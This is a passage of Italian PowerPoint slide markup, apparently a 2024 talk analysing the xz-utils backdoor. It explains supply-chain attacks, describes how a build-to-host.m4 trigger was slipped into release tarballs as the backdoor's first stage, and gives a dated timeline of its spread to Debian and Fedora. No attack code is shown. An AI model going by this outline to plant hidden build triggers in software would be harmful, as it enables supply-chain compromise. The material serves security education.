                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Viene creato il package contenente il Source Code, destinato ai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> developers, e le relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che verranno inserite nella sezione Releases sul upstream GitHub e sulla analoga sezione downstream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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3" name="Immagine 2" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{153BE896-D413-6462-633B-B2BD9B2AFE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726" y="3933087"/>
            <a:ext cx="4352637" cy="2709460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{054A6711-27A3-24D0-52AB-7509760742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0727" y="3938245"/>
            <a:ext cx="6096000" cy="2629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96004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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="200054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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nella fase di creazione del package, poi mandato da upstream a downstream, gli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autotool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fanno uso dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per generare la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Makefile.in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è possibile distinguere il file "m4/build-to-host.m4".</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A46A8431-2A01-65DD-EF18-558ACE5E06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0" y="3937953"/>
            <a:ext cx="8381999" cy="2538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8516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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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417" y="3300"/>
            <a:ext cx="10513747" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73743" y="1849693"/>
            <a:ext cx="12115185" cy="169277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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cos'è un Supply Chain Attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anziché puntare direttamente alla network dell'organizzazione, gli hacker puntano ad un componente di terze parti in uso nella catena di produzione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, diagramma, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD595321-A43E-AB10-38C3-95954F7796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08" t="23592" r="897" b="7507"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1614857" y="3785020"/>
            <a:ext cx="9051653" cy="3072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85722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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="458587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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Il file m4/build-to-host.m4 contiene la prima fase della costruzione della backdoor.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questo script proviene originariamente dalla libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gnulib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ed offre un supporto trigger in fase di installazione del pacchetto (conversione dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). Tale file non è presente nella cartella m4 né in upstream né in downstream, ma è menzionato nel .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gitignore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di /m4.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tale trigger è stato inserito nella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> durante la creazione della Release.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cosa eseguirà build-to-host.m4?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="24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366567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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="38472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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release e diffusione della backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eventi rilevanti nella diffusione verso le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> aventi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>integrazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24 Febbraio 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.6.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>26 Febbraio 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unstable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>27 Febbraio 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan contatta Fedora per un update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> su Fedora 40;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 Marzo 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9 Marzo 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.6.1 release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>25 Marzo 2024: Hans Jansen segnala bug a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e richiede update  a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>27 Marzo 2024: </a:t>
            </a:r>
            <a:r>
